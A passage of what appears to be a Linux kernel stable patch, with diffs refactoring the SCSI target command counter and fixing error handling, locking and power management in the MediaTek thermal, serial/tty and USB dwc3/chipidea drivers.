+-	int task_attr,
+-	unsigned char *sense_buffer, u64 unpacked_lun)
++void __target_init_cmd(struct se_cmd *cmd,
++		       const struct target_core_fabric_ops *tfo,
++		       struct se_session *se_sess, u32 data_length,
++		       int data_direction, int task_attr,
++		       unsigned char *sense_buffer, u64 unpacked_lun,
++		       struct target_cmd_counter *cmd_cnt)
+ {
+ 	INIT_LIST_HEAD(&cmd->se_delayed_node);
+ 	INIT_LIST_HEAD(&cmd->se_qf_node);
+@@ -1439,6 +1467,7 @@ void __target_init_cmd(
+ 	cmd->sam_task_attr = task_attr;
+ 	cmd->sense_buffer = sense_buffer;
+ 	cmd->orig_fe_lun = unpacked_lun;
++	cmd->cmd_cnt = cmd_cnt;
+ 
+ 	if (!(cmd->se_cmd_flags & SCF_USE_CPUID))
+ 		cmd->cpuid = raw_smp_processor_id();
+@@ -1658,7 +1687,8 @@ int target_init_cmd(struct se_cmd *se_cmd, struct se_session *se_sess,
+ 	 * target_core_fabric_ops->queue_status() callback
+ 	 */
+ 	__target_init_cmd(se_cmd, se_tpg->se_tpg_tfo, se_sess, data_length,
+-			  data_dir, task_attr, sense, unpacked_lun);
++			  data_dir, task_attr, sense, unpacked_lun,
++			  se_sess->cmd_cnt);
+ 
+ 	/*
+ 	 * Obtain struct se_cmd->cmd_kref reference. A second kref_get here is
+@@ -1953,7 +1983,8 @@ int target_submit_tmr(struct se_cmd *se_cmd, struct se_session *se_sess,
+ 	BUG_ON(!se_tpg);
+ 
+ 	__target_init_cmd(se_cmd, se_tpg->se_tpg_tfo, se_sess,
+-			  0, DMA_NONE, TCM_SIMPLE_TAG, sense, unpacked_lun);
++			  0, DMA_NONE, TCM_SIMPLE_TAG, sense, unpacked_lun,
++			  se_sess->cmd_cnt);
+ 	/*
+ 	 * FIXME: Currently expect caller to handle se_cmd->se_tmr_req
+ 	 * allocation failure.
+@@ -2957,7 +2988,6 @@ EXPORT_SYMBOL(transport_generic_free_cmd);
+  */
+ int target_get_sess_cmd(struct se_cmd *se_cmd, bool ack_kref)
+ {
+-	struct se_session *se_sess = se_cmd->se_sess;
+ 	int ret = 0;
+ 
+ 	/*
+@@ -2970,9 +3000,14 @@ int target_get_sess_cmd(struct se_cmd *se_cmd, bool ack_kref)
+ 		se_cmd->se_cmd_flags |= SCF_ACK_KREF;
+ 	}
+ 
+-	if (!percpu_ref_tryget_live(&se_sess->cmd_count))
+-		ret = -ESHUTDOWN;
+-
++	/*
++	 * Users like xcopy do not use counters since they never do a stop
++	 * and wait.
++	 */
++	if (se_cmd->cmd_cnt) {
++		if (!percpu_ref_tryget_live(&se_cmd->cmd_cnt->refcnt))
++			ret = -ESHUTDOWN;
++	}
+ 	if (ret && ack_kref)
+ 		target_put_sess_cmd(se_cmd);
+ 
+@@ -2993,7 +3028,7 @@ static void target_free_cmd_mem(struct se_cmd *cmd)
+ static void target_release_cmd_kref(struct kref *kref)
+ {
+ 	struct se_cmd *se_cmd = container_of(kref, struct se_cmd, cmd_kref);
+-	struct se_session *se_sess = se_cmd->se_sess;
++	struct target_cmd_counter *cmd_cnt = se_cmd->cmd_cnt;
+ 	struct completion *free_compl = se_cmd->free_compl;
+ 	struct completion *abrt_compl = se_cmd->abrt_compl;
+ 
+@@ -3004,7 +3039,8 @@ static void target_release_cmd_kref(struct kref *kref)
+ 	if (abrt_compl)
+ 		complete(abrt_compl);
+ 
+-	percpu_ref_put(&se_sess->cmd_count);
++	if (cmd_cnt)
++		percpu_ref_put(&cmd_cnt->refcnt);
+ }
+ 
+ /**
+@@ -3123,46 +3159,67 @@ void target_show_cmd(const char *pfx, struct se_cmd *cmd)
+ }
+ EXPORT_SYMBOL(target_show_cmd);
+ 
+-static void target_stop_session_confirm(struct percpu_ref *ref)
++static void target_stop_cmd_counter_confirm(struct percpu_ref *ref)
++{
++	struct target_cmd_counter *cmd_cnt = container_of(ref,
++						struct target_cmd_counter,
++						refcnt);
++	complete_all(&cmd_cnt->stop_done);
++}
++
++/**
++ * target_stop_cmd_counter - Stop new IO from being added to the counter.
++ * @cmd_cnt: counter to stop
++ */
++void target_stop_cmd_counter(struct target_cmd_counter *cmd_cnt)
+ {
+-	struct se_session *se_sess = container_of(ref, struct se_session,
+-						  cmd_count);
+-	complete_all(&se_sess->stop_done);
++	pr_debug("Stopping command counter.\n");
++	if (!atomic_cmpxchg(&cmd_cnt->stopped, 0, 1))
++		percpu_ref_kill_and_confirm(&cmd_cnt->refcnt,
++					    target_stop_cmd_counter_confirm);
+ }
++EXPORT_SYMBOL_GPL(target_stop_cmd_counter);
+ 
+ /**
+  * target_stop_session - Stop new IO from being queued on the session.
+- * @se_sess:    session to stop
++ * @se_sess: session to stop
+  */
+ void target_stop_session(struct se_session *se_sess)
+ {
+-	pr_debug("Stopping session queue.\n");
+-	if (atomic_cmpxchg(&se_sess->stopped, 0, 1) == 0)
+-		percpu_ref_kill_and_confirm(&se_sess->cmd_count,
+-					    target_stop_session_confirm);
++	target_stop_cmd_counter(se_sess->cmd_cnt);
+ }
+ EXPORT_SYMBOL(target_stop_session);
+ 
+ /**
+- * target_wait_for_sess_cmds - Wait for outstanding commands
+- * @se_sess:    session to wait for active I/O
++ * target_wait_for_cmds - Wait for outstanding cmds.
++ * @cmd_cnt: counter to wait for active I/O for.
+  */
+-void target_wait_for_sess_cmds(struct se_session *se_sess)
++void target_wait_for_cmds(struct target_cmd_counter *cmd_cnt)
+ {
+ 	int ret;
+ 
+-	WARN_ON_ONCE(!atomic_read(&se_sess->stopped));
++	WARN_ON_ONCE(!atomic_read(&cmd_cnt->stopped));
+ 
+ 	do {
+ 		pr_debug("Waiting for running cmds to complete.\n");
+-		ret = wait_event_timeout(se_sess->cmd_count_wq,
+-				percpu_ref_is_zero(&se_sess->cmd_count),
+-				180 * HZ);
++		ret = wait_event_timeout(cmd_cnt->refcnt_wq,
++					 percpu_ref_is_zero(&cmd_cnt->refcnt),
++					 180 * HZ);
+ 	} while (ret <= 0);
+ 
+-	wait_for_completion(&se_sess->stop_done);
++	wait_for_completion(&cmd_cnt->stop_done);
+ 	pr_debug("Waiting for cmds done.\n");
+ }
++EXPORT_SYMBOL_GPL(target_wait_for_cmds);
++
++/**
++ * target_wait_for_sess_cmds - Wait for outstanding commands
++ * @se_sess: session to wait for active I/O
++ */
++void target_wait_for_sess_cmds(struct se_session *se_sess)
++{
++	target_wait_for_cmds(se_sess->cmd_cnt);
++}
+ EXPORT_SYMBOL(target_wait_for_sess_cmds);
+ 
+ /*
+diff --git a/drivers/target/target_core_xcopy.c b/drivers/target/target_core_xcopy.c
+index 49eaee022ef1d..91ed015b588c6 100644
+--- a/drivers/target/target_core_xcopy.c
++++ b/drivers/target/target_core_xcopy.c
+@@ -461,8 +461,6 @@ static const struct target_core_fabric_ops xcopy_pt_tfo = {
+ 
+ int target_xcopy_setup_pt(void)
+ {
+-	int ret;
+-
+ 	xcopy_wq = alloc_workqueue("xcopy_wq", WQ_MEM_RECLAIM, 0);
+ 	if (!xcopy_wq) {
+ 		pr_err("Unable to allocate xcopy_wq\n");
+@@ -479,9 +477,7 @@ int target_xcopy_setup_pt(void)
+ 	INIT_LIST_HEAD(&xcopy_pt_nacl.acl_list);
+ 	INIT_LIST_HEAD(&xcopy_pt_nacl.acl_sess_list);
+ 	memset(&xcopy_pt_sess, 0, sizeof(struct se_session));
+-	ret = transport_init_session(&xcopy_pt_sess);
+-	if (ret < 0)
+-		goto destroy_wq;
++	transport_init_session(&xcopy_pt_sess);
+ 
+ 	xcopy_pt_nacl.se_tpg = &xcopy_pt_tpg;
+ 	xcopy_pt_nacl.nacl_sess = &xcopy_pt_sess;
+@@ -490,19 +486,12 @@ int target_xcopy_setup_pt(void)
+ 	xcopy_pt_sess.se_node_acl = &xcopy_pt_nacl;
+ 
+ 	return 0;
+-
+-destroy_wq:
+-	destroy_workqueue(xcopy_wq);
+-	xcopy_wq = NULL;
+-	return ret;
+ }
+ 
+ void target_xcopy_release_pt(void)
+ {
+-	if (xcopy_wq) {
++	if (xcopy_wq)
+ 		destroy_workqueue(xcopy_wq);
+-		transport_uninit_session(&xcopy_pt_sess);
+-	}
+ }
+ 
+ /*
+@@ -602,8 +591,8 @@ static int target_xcopy_read_source(
+ 		(unsigned long long)src_lba, transfer_length_block, src_bytes);
+ 
+ 	__target_init_cmd(se_cmd, &xcopy_pt_tfo, &xcopy_pt_sess, src_bytes,
+-			  DMA_FROM_DEVICE, 0, &xpt_cmd.sense_buffer[0], 0);
+-
++			  DMA_FROM_DEVICE, 0, &xpt_cmd.sense_buffer[0], 0,
++			  NULL);
+ 	rc = target_xcopy_setup_pt_cmd(&xpt_cmd, xop, src_dev, &cdb[0],
+ 				remote_port);
+ 	if (rc < 0) {
+@@ -647,8 +636,8 @@ static int target_xcopy_write_destination(
+ 		(unsigned long long)dst_lba, transfer_length_block, dst_bytes);
+ 
+ 	__target_init_cmd(se_cmd, &xcopy_pt_tfo, &xcopy_pt_sess, dst_bytes,
+-			  DMA_TO_DEVICE, 0, &xpt_cmd.sense_buffer[0], 0);
+-
++			  DMA_TO_DEVICE, 0, &xpt_cmd.sense_buffer[0], 0,
++			  NULL);
+ 	rc = target_xcopy_setup_pt_cmd(&xpt_cmd, xop, dst_dev, &cdb[0],
+ 				remote_port);
+ 	if (rc < 0) {
+diff --git a/drivers/thermal/mtk_thermal.c b/drivers/thermal/mtk_thermal.c
+index 8440692e3890d..62f1e691659e3 100644
+--- a/drivers/thermal/mtk_thermal.c
++++ b/drivers/thermal/mtk_thermal.c
+@@ -1028,7 +1028,12 @@ static int mtk_thermal_probe(struct platform_device *pdev)
+ 		return -ENODEV;
+ 	}
+ 
+-	auxadc_base = of_iomap(auxadc, 0);
++	auxadc_base = devm_of_iomap(&pdev->dev, auxadc, 0, NULL);
++	if (IS_ERR(auxadc_base)) {
++		of_node_put(auxadc);
++		return PTR_ERR(auxadc_base);
++	}
++
+ 	auxadc_phys_base = of_get_phys_base(auxadc);
+ 
+ 	of_node_put(auxadc);
+@@ -1044,7 +1049,12 @@ static int mtk_thermal_probe(struct platform_device *pdev)
+ 		return -ENODEV;
+ 	}
+ 
+-	apmixed_base = of_iomap(apmixedsys, 0);
++	apmixed_base = devm_of_iomap(&pdev->dev, apmixedsys, 0, NULL);
++	if (IS_ERR(apmixed_base)) {
++		of_node_put(apmixedsys);
++		return PTR_ERR(apmixed_base);
++	}
++
+ 	apmixed_phys_base = of_get_phys_base(apmixedsys);
+ 
+ 	of_node_put(apmixedsys);
+diff --git a/drivers/thunderbolt/tb.h b/drivers/thunderbolt/tb.h
+index f034723b1b40e..f79cae48a8eab 100644
+--- a/drivers/thunderbolt/tb.h
++++ b/drivers/thunderbolt/tb.h
+@@ -1058,7 +1058,7 @@ void tb_port_lane_bonding_disable(struct tb_port *port);
+ int tb_port_wait_for_link_width(struct tb_port *port, int width,
+ 				int timeout_msec);
+ int tb_port_update_credits(struct tb_port *port);
+-bool tb_port_is_clx_enabled(struct tb_port *port, enum tb_clx clx);
++bool tb_port_is_clx_enabled(struct tb_port *port, unsigned int clx);
+ 
+ int tb_switch_find_vse_cap(struct tb_switch *sw, enum tb_switch_vse_cap vsec);
+ int tb_switch_find_cap(struct tb_switch *sw, enum tb_switch_cap cap);
+diff --git a/drivers/tty/serial/8250/8250.h b/drivers/tty/serial/8250/8250.h
+index 287153d325365..1e8fe44a7099f 100644
+--- a/drivers/tty/serial/8250/8250.h
++++ b/drivers/tty/serial/8250/8250.h
+@@ -365,6 +365,13 @@ static inline void serial8250_do_prepare_rx_dma(struct uart_8250_port *p)
+ 	if (dma->prepare_rx_dma)
+ 		dma->prepare_rx_dma(p);
+ }
++
++static inline bool serial8250_tx_dma_running(struct uart_8250_port *p)
++{
++	struct uart_8250_dma *dma = p->dma;
++
++	return dma && dma->tx_running;
++}
+ #else
+ static inline int serial8250_tx_dma(struct uart_8250_port *p)
+ {
+@@ -380,6 +387,11 @@ static inline int serial8250_request_dma(struct uart_8250_port *p)
+ 	return -1;
+ }
+ static inline void serial8250_release_dma(struct uart_8250_port *p) { }
++
++static inline bool serial8250_tx_dma_running(struct uart_8250_port *p)
++{
++	return false;
++}
+ #endif
+ 
+ static inline int ns16550a_goto_highspeed(struct uart_8250_port *up)
+diff --git a/drivers/tty/serial/8250/8250_bcm7271.c b/drivers/tty/serial/8250/8250_bcm7271.c
+index ed5a947476920..f801b1f5b46c0 100644
+--- a/drivers/tty/serial/8250/8250_bcm7271.c
++++ b/drivers/tty/serial/8250/8250_bcm7271.c
+@@ -1014,14 +1014,16 @@ static int brcmuart_probe(struct platform_device *pdev)
+ 	/* See if a Baud clock has been specified */
+ 	baud_mux_clk = of_clk_get_by_name(np, "sw_baud");
+ 	if (IS_ERR(baud_mux_clk)) {
+-		if (PTR_ERR(baud_mux_clk) == -EPROBE_DEFER)
+-			return -EPROBE_DEFER;
++		if (PTR_ERR(baud_mux_clk) == -EPROBE_DEFER) {
++			ret = -EPROBE_DEFER;
++			goto release_dma;
++		}
+ 		dev_dbg(dev, "BAUD MUX clock not specified\n");
+ 	} else {
+ 		dev_dbg(dev, "BAUD MUX clock found\n");
+ 		ret = clk_prepare_enable(baud_mux_clk);
+ 		if (ret)
+-			return ret;
++			goto release_dma;
+ 		priv->baud_mux_clk = baud_mux_clk;
+ 		init_real_clk_rates(dev, priv);
+ 		clk_rate = priv->default_mux_rate;
+@@ -1029,7 +1031,8 @@ static int brcmuart_probe(struct platform_device *pdev)
+ 
+ 	if (clk_rate == 0) {
+ 		dev_err(dev, "clock-frequency or clk not defined\n");
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto release_dma;
+ 	}
+ 
+ 	dev_dbg(dev, "DMA is %senabled\n", priv->dma_enabled ? "" : "not ");
+@@ -1116,7 +1119,9 @@ err1:
+ 	serial8250_unregister_port(priv->line);
+ err:
+ 	brcmuart_free_bufs(dev, priv);
+-	brcmuart_arbitration(priv, 0);
++release_dma:
++	if (priv->dma_enabled)
++		brcmuart_arbitration(priv, 0);
+ 	return ret;
+ }
+ 
+@@ -1128,7 +1133,8 @@ static int brcmuart_remove(struct platform_device *pdev)
+ 	hrtimer_cancel(&priv->hrt);
+ 	serial8250_unregister_port(priv->line);
+ 	brcmuart_free_bufs(&pdev->dev, priv);
+-	brcmuart_arbitration(priv, 0);
++	if (priv->dma_enabled)
++		brcmuart_arbitration(priv, 0);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/tty/serial/8250/8250_port.c b/drivers/tty/serial/8250/8250_port.c
+index d006467ec7843..fa220620511e5 100644
+--- a/drivers/tty/serial/8250/8250_port.c
++++ b/drivers/tty/serial/8250/8250_port.c
+@@ -15,6 +15,7 @@
+ #include <linux/moduleparam.h>
+ #include <linux/ioport.h>
+ #include <linux/init.h>
++#include <linux/irq.h>
+ #include <linux/console.h>
+ #include <linux/gpio/consumer.h>
+ #include <linux/sysrq.h>
+@@ -1925,6 +1926,7 @@ static bool handle_rx_dma(struct uart_8250_port *up, unsigned int iir)
+ int serial8250_handle_irq(struct uart_port *port, unsigned int iir)
+ {
+ 	struct uart_8250_port *up = up_to_u8250p(port);
++	struct tty_port *tport = &port->state->port;
+ 	bool skip_rx = false;
+ 	unsigned long flags;
+ 	u16 status;
+@@ -1950,6 +1952,8 @@ int serial8250_handle_irq(struct uart_port *port, unsigned int iir)
+ 		skip_rx = true;
+ 
+ 	if (status & (UART_LSR_DR | UART_LSR_BI) && !skip_rx) {
++		if (irqd_is_wakeup_set(irq_get_irq_data(port->irq)))
++			pm_wakeup_event(tport->tty->dev, 0);
+ 		if (!up->dma || handle_rx_dma(up, iir))
+ 			status = serial8250_rx_chars(up, status);
+ 	}
+@@ -2009,18 +2013,19 @@ static int serial8250_tx_threshold_handle_irq(struct uart_port *port)
+ static unsigned int serial8250_tx_empty(struct uart_port *port)
+ {
+ 	struct uart_8250_port *up = up_to_u8250p(port);
++	unsigned int result = 0;
+ 	unsigned long flags;
+-	u16 lsr;
+ 
+ 	serial8250_rpm_get(up);
+ 
+ 	spin_lock_irqsave(&port->lock, flags);
+-	lsr = serial_lsr_in(up);
++	if (!serial8250_tx_dma_running(up) && uart_lsr_tx_empty(serial_lsr_in(up)))
++		result = TIOCSER_TEMT;
+ 	spin_unlock_irqrestore(&port->lock, flags);
+ 
+ 	serial8250_rpm_put(up);
+ 
+-	return uart_lsr_tx_empty(lsr) ? TIOCSER_TEMT : 0;
++	return result;
+ }
+ 
+ unsigned int serial8250_do_get_mctrl(struct uart_port *port)
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index 59c10bceebbef..29b50a0792dcf 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -1270,7 +1270,7 @@ static inline int lpuart_start_rx_dma(struct lpuart_port *sport)
+ 	 * 10ms at any baud rate.
+ 	 */
+ 	sport->rx_dma_rng_buf_len = (DMA_RX_TIMEOUT * baud /  bits / 1000) * 2;
+-	sport->rx_dma_rng_buf_len = (1 << (fls(sport->rx_dma_rng_buf_len) - 1));
++	sport->rx_dma_rng_buf_len = (1 << fls(sport->rx_dma_rng_buf_len));
+ 	if (sport->rx_dma_rng_buf_len < 16)
+ 		sport->rx_dma_rng_buf_len = 16;
+ 
+diff --git a/drivers/tty/serial/max310x.c b/drivers/tty/serial/max310x.c
+index 4eb24e3407f80..9ec39edf56b81 100644
+--- a/drivers/tty/serial/max310x.c
++++ b/drivers/tty/serial/max310x.c
+@@ -525,6 +525,11 @@ static bool max310x_reg_precious(struct device *dev, unsigned int reg)
+ 	return false;
+ }
+ 
++static bool max310x_reg_noinc(struct device *dev, unsigned int reg)
++{
++	return reg == MAX310X_RHR_REG;
++}
++
+ static int max310x_set_baud(struct uart_port *port, int baud)
+ {
+ 	unsigned int mode = 0, div = 0, frac = 0, c = 0, F = 0;
+@@ -651,14 +656,14 @@ static void max310x_batch_write(struct uart_port *port, u8 *txbuf, unsigned int
+ {
+ 	struct max310x_one *one = to_max310x_port(port);
+ 
+-	regmap_raw_write(one->regmap, MAX310X_THR_REG, txbuf, len);
++	regmap_noinc_write(one->regmap, MAX310X_THR_REG, txbuf, len);
+ }
+ 
+ static void max310x_batch_read(struct uart_port *port, u8 *rxbuf, unsigned int len)
+ {
+ 	struct max310x_one *one = to_max310x_port(port);
+ 
+-	regmap_raw_read(one->regmap, MAX310X_RHR_REG, rxbuf, len);
++	regmap_noinc_read(one->regmap, MAX310X_RHR_REG, rxbuf, len);
+ }
+ 
+ static void max310x_handle_rx(struct uart_port *port, unsigned int rxlen)
+@@ -1469,6 +1474,10 @@ static struct regmap_config regcfg = {
+ 	.writeable_reg = max310x_reg_writeable,
+ 	.volatile_reg = max310x_reg_volatile,
+ 	.precious_reg = max310x_reg_precious,
++	.writeable_noinc_reg = max310x_reg_noinc,
++	.readable_noinc_reg = max310x_reg_noinc,
++	.max_raw_read = MAX310X_FIFO_SIZE,
++	.max_raw_write = MAX310X_FIFO_SIZE,
+ };
+ 
+ #ifdef CONFIG_SPI_MASTER
+@@ -1554,6 +1563,10 @@ static struct regmap_config regcfg_i2c = {
+ 	.volatile_reg = max310x_reg_volatile,
+ 	.precious_reg = max310x_reg_precious,
+ 	.max_register = MAX310X_I2C_REVID_EXTREG,
++	.writeable_noinc_reg = max310x_reg_noinc,
++	.readable_noinc_reg = max310x_reg_noinc,
++	.max_raw_read = MAX310X_FIFO_SIZE,
++	.max_raw_write = MAX310X_FIFO_SIZE,
+ };
+ 
+ static const struct max310x_if_cfg max310x_i2c_if_cfg = {
+diff --git a/drivers/tty/serial/serial_core.c b/drivers/tty/serial/serial_core.c
+index ec874f3a567ca..eea526d34fdda 100644
+--- a/drivers/tty/serial/serial_core.c
++++ b/drivers/tty/serial/serial_core.c
+@@ -1552,7 +1552,7 @@ uart_ioctl(struct tty_struct *tty, unsigned int cmd, unsigned long arg)
+ 		goto out;
+ 
+ 	/* rs485_config requires more locking than others */
+-	if (cmd == TIOCGRS485)
++	if (cmd == TIOCSRS485)
+ 		down_write(&tty->termios_rwsem);
+ 
+ 	mutex_lock(&port->mutex);
+@@ -1595,7 +1595,7 @@ uart_ioctl(struct tty_struct *tty, unsigned int cmd, unsigned long arg)
+ 	}
+ out_up:
+ 	mutex_unlock(&port->mutex);
+-	if (cmd == TIOCGRS485)
++	if (cmd == TIOCSRS485)
+ 		up_write(&tty->termios_rwsem);
+ out:
+ 	return ret;
+diff --git a/drivers/tty/serial/stm32-usart.c b/drivers/tty/serial/stm32-usart.c
+index 409e91d6829a5..81a53cc41dcb8 100644
+--- a/drivers/tty/serial/stm32-usart.c
++++ b/drivers/tty/serial/stm32-usart.c
+@@ -689,8 +689,9 @@ static void stm32_usart_transmit_chars(struct uart_port *port)
+ 	int ret;
+ 
+ 	if (!stm32_port->hw_flow_control &&
+-	    port->rs485.flags & SER_RS485_ENABLED) {
+-		stm32_port->txdone = false;
++	    port->rs485.flags & SER_RS485_ENABLED &&
++	    (port->x_char ||
++	     !(uart_circ_empty(xmit) || uart_tx_stopped(port)))) {
+ 		stm32_usart_tc_interrupt_disable(port);
+ 		stm32_usart_rs485_rts_enable(port);
+ 	}
+diff --git a/drivers/tty/tty.h b/drivers/tty/tty.h
+index f45cd683c02ea..1e0d80e98d263 100644
+--- a/drivers/tty/tty.h
++++ b/drivers/tty/tty.h
+@@ -62,6 +62,8 @@ int __tty_check_change(struct tty_struct *tty, int sig);
+ int tty_check_change(struct tty_struct *tty);
+ void __stop_tty(struct tty_struct *tty);
+ void __start_tty(struct tty_struct *tty);
++void tty_write_unlock(struct tty_struct *tty);
++int tty_write_lock(struct tty_struct *tty, int ndelay);
+ void tty_vhangup_session(struct tty_struct *tty);
+ void tty_open_proc_set_tty(struct file *filp, struct tty_struct *tty);
+ int tty_signal_session_leader(struct tty_struct *tty, int exit_session);
+diff --git a/drivers/tty/tty_io.c b/drivers/tty/tty_io.c
+index 36fb945fdad48..8e3de07f103da 100644
+--- a/drivers/tty/tty_io.c
++++ b/drivers/tty/tty_io.c
+@@ -933,13 +933,13 @@ static ssize_t tty_read(struct kiocb *iocb, struct iov_iter *to)
+ 	return i;
+ }
+ 
+-static void tty_write_unlock(struct tty_struct *tty)
++void tty_write_unlock(struct tty_struct *tty)
+ {
+ 	mutex_unlock(&tty->atomic_write_lock);
+ 	wake_up_interruptible_poll(&tty->write_wait, EPOLLOUT);
+ }
+ 
+-static int tty_write_lock(struct tty_struct *tty, int ndelay)
++int tty_write_lock(struct tty_struct *tty, int ndelay)
+ {
+ 	if (!mutex_trylock(&tty->atomic_write_lock)) {
+ 		if (ndelay)
+diff --git a/drivers/tty/tty_ioctl.c b/drivers/tty/tty_ioctl.c
+index ce511557b98b1..ad1cf51ecd11d 100644
+--- a/drivers/tty/tty_ioctl.c
++++ b/drivers/tty/tty_ioctl.c
+@@ -500,21 +500,42 @@ static int set_termios(struct tty_struct *tty, void __user *arg, int opt)
+ 	tmp_termios.c_ispeed = tty_termios_input_baud_rate(&tmp_termios);
+ 	tmp_termios.c_ospeed = tty_termios_baud_rate(&tmp_termios);
+ 
+-	ld = tty_ldisc_ref(tty);
++	if (opt & (TERMIOS_FLUSH|TERMIOS_WAIT)) {
++retry_write_wait:
++		retval = wait_event_interruptible(tty->write_wait, !tty_chars_in_buffer(tty));
++		if (retval < 0)
++			return retval;
+ 
+-	if (ld != NULL) {
+-		if ((opt & TERMIOS_FLUSH) && ld->ops->flush_buffer)
+-			ld->ops->flush_buffer(tty);
+-		tty_ldisc_deref(ld);
+-	}
++		if (tty_write_lock(tty, 0) < 0)
++			goto retry_write_wait;
+ 
+-	if (opt & TERMIOS_WAIT) {
+-		tty_wait_until_sent(tty, 0);
+-		if (signal_pending(current))
+-			return -ERESTARTSYS;
+-	}
++		/* Racing writer? */
++		if (tty_chars_in_buffer(tty)) {
++			tty_write_unlock(tty);
++			goto retry_write_wait;
++		}
+ 
+-	tty_set_termios(tty, &tmp_termios);
++		ld = tty_ldisc_ref(tty);
++		if (ld != NULL) {
++			if ((opt & TERMIOS_FLUSH) && ld->ops->flush_buffer)
++				ld->ops->flush_buffer(tty);
++			tty_ldisc_deref(ld);
++		}
++
++		if ((opt & TERMIOS_WAIT) && tty->ops->wait_until_sent) {
++			tty->ops->wait_until_sent(tty, 0);
++			if (signal_pending(current)) {
++				tty_write_unlock(tty);
++				return -ERESTARTSYS;
++			}
++		}
++
++		tty_set_termios(tty, &tmp_termios);
++
++		tty_write_unlock(tty);
++	} else {
++		tty_set_termios(tty, &tmp_termios);
++	}
+ 
+ 	/* FIXME: Arguably if tmp_termios == tty->termios AND the
+ 	   actual requested termios was not tmp_termios then we may
+diff --git a/drivers/usb/chipidea/core.c b/drivers/usb/chipidea/core.c
+index 281fc51720cea..25084ce7c297b 100644
+--- a/drivers/usb/chipidea/core.c
++++ b/drivers/usb/chipidea/core.c
+@@ -1108,7 +1108,7 @@ static int ci_hdrc_probe(struct platform_device *pdev)
+ 	ret = ci_usb_phy_init(ci);
+ 	if (ret) {
+ 		dev_err(dev, "unable to init phy: %d\n", ret);
+-		return ret;
++		goto ulpi_exit;
+ 	}
+ 
+ 	ci->hw_bank.phys = res->start;
+diff --git a/drivers/usb/dwc3/core.c b/drivers/usb/dwc3/core.c
+index 476b636185116..9f8c988c25cb1 100644
+--- a/drivers/usb/dwc3/core.c
++++ b/drivers/usb/dwc3/core.c
+@@ -1883,13 +1883,11 @@ static int dwc3_probe(struct platform_device *pdev)
+ 	spin_lock_init(&dwc->lock);
+ 	mutex_init(&dwc->mutex);
+ 
++	pm_runtime_get_noresume(dev);
+ 	pm_runtime_set_active(dev);
+ 	pm_runtime_use_autosuspend(dev);
+ 	pm_runtime_set_autosuspend_delay(dev, DWC3_DEFAULT_AUTOSUSPEND_DELAY);
+ 	pm_runtime_enable(dev);
+-	ret = pm_runtime_get_sync(dev);
+-	if (ret < 0)
+-		goto err1;
+ 
+ 	pm_runtime_forbid(dev);
+ 
+@@ -1954,12 +1952,10 @@ err3:
+ 	dwc3_free_event_buffers(dwc);
+ 
+ err2:
+-	pm_runtime_allow(&pdev->dev);
+-
+-err1:
+-	pm_runtime_put_sync(&pdev->dev);
+-	pm_runtime_disable(&pdev->dev);
+-
++	pm_runtime_allow(dev);
++	pm_runtime_disable(dev);
++	pm_runtime_set_suspended(dev);
++	pm_runtime_put_noidle(dev);
+ disable_clks:
+ 	dwc3_clk_disable(dwc);
+ assert_reset:
+@@ -1983,6 +1979,7 @@ static int dwc3_remove(struct platform_device *pdev)
+ 	dwc3_core_exit(dwc);
+ 	dwc3_ulpi_exit(dwc);
+ 
++	pm_runtime_allow(&pdev->dev);
+ 	pm_runtime_disable(&pdev->dev);
+ 	pm_runtime_put_noidle(&pdev->dev);
+ 	pm_runtime_set_suspended(&pdev->dev);
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index cf5b4f49c3ed8..3faac3244c7db 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -2532,29 +2532,17 @@ static int __dwc3_gadget_start(struct dwc3 *dwc);
+ static int dwc3_gadget_soft_disconnect(struct dwc3 *dwc)
+ {
+ 	unsigned long flags;
++	int ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	dwc->connected = false;
+ 
+ 	/*
+-	 * Per databook, when we want to stop the gadget, if a control transfer
+-	 * is still in process, complete it and get the core into setup phase.
++	 * Attempt to end pending SETUP status phase, and not wait for the
++	 * function to do so.
+ 	 */
+-	if (dwc->ep0state != EP0_SETUP_PHASE) {
+-		int ret;
+-
+-		if (dwc->delayed_status)
+-			dwc3_ep0_send_delayed_status(dwc);
+-
+-		reinit_completion(&dwc->ep0_in_setup);
+-
+-		spin_unlock_irqrestore(&dwc->lock, flags);
+-		ret = wait_for_completion_timeout(&dwc->ep0_in_setup,
+-				msecs_to_jiffies(DWC3_PULL_UP_TIMEOUT));
+-		spin_lock_irqsave(&dwc->lock, flags);
+-		if (ret == 0)
+-			dev_warn(dwc->dev, "timed out waiting for SETUP phase\n");
+-	}
++	if (dwc->delayed_status)
++		dwc3_ep0_send_delayed_status(dwc);
+ 
+ 	/*
+ 	 * In the Synopsys DesignWare Cores USB3 Databook Rev. 3.30a
+@@ -2567,6 +2555,33 @@ static int dwc3_gadget_soft_disconnect(struct dwc3 *dwc)
+ 	__dwc3_gadget_stop(dwc);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
++	/*
++	 * Per databook, when we want to stop the gadget, if a control transfer
++	 * is still in process, complete it and get the core into setup phase.
++	 * In case the host is unresponsive to a SETUP transaction, forcefully
++	 * stall the transfer, and move back to the SETUP phase, so that any
++	 * pending endxfers can be executed.
++	 */
++	if (dwc->ep0state != EP0_SETUP_PHASE) {
++		reinit_completion(&dwc->ep0_in_setup);
++
++		ret = wait_for_completion_timeout(&dwc->ep0_in_setup,
++				msecs_to_jiffies(DWC3_PULL_UP_TIMEOUT));
++		if (ret == 0) {
++			unsigned int    dir;
++
++			dev_warn(dwc->dev, "wait for SETUP phase timed out\n");
++			spin_lock_irqsave(&dwc->lock, flags);
++			dir = !!dwc->ep0_expect_in;
++			if (dwc->ep0state == EP0_DATA_PHASE)
++				dwc3_ep0_end_control_data(dwc, dwc->eps[dir]);
++			else
++				dwc3_ep0_end_control_data(dwc, dwc->eps[!dir]);
++			dwc3_ep0_stall_and_restart(dwc);
++			spin_unlock_irqrestore(&dwc->lock, flags);
++		}
++	}
++
+ 	/*
+ 	 * Note: if the GEVNTCOUNT indicates events in the event buffer, the
+ 	 * driver needs to acknowledge them before the controller can halt.
